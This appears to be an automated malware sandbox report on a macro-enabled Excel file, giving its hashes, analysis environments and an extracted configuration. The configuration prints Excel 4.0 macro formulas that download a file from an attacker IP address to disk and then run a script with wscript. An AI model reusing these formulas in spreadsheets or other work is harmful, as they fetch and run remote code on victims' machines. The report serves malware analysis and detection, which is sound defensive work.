Static task: static1
Behavioral task: behavioral1
  Sample: ad1cd20cdf48ccb42ddefd3c3a0033b9.xlsm
  Resource: win7-20231215-en
Behavioral task: behavioral2
  Sample: ad1cd20cdf48ccb42ddefd3c3a0033b9.xlsm
  Resource: win10v2004-20231215-en
General
Target: ad1cd20cdf48ccb42ddefd3c3a0033b9
Size: 6KB
MD5: ad1cd20cdf48ccb42ddefd3c3a0033b9
SHA1: a5c11e16614a6d206d76fb3b068f2a5128b3fd9c
SHA256: 497c758891df758b6b57ed619904acc433ec0a12353faf1162e1ba92cf46ed90
SHA512: 84b090f0e571f3db92caa949854ba39b0ee0659cefa5682800bf006cb2f03c0328913f8beda936ef36f4fed14d794c2d29a675f496d7f56fc8d22a62103dde9b
SSDEEP: 192:NDSMuSCbrA2OmmfR58UhHFBFYunb98yV8+N:NjuDM2w/1FY+b98yVP
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0)
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0)
=EXEC("wscript C:\zer\spp.vbs")
=HALT()
Signatures
Files
ad1cd20cdf48ccb42ddefd3c3a0033b9.xlsm office2007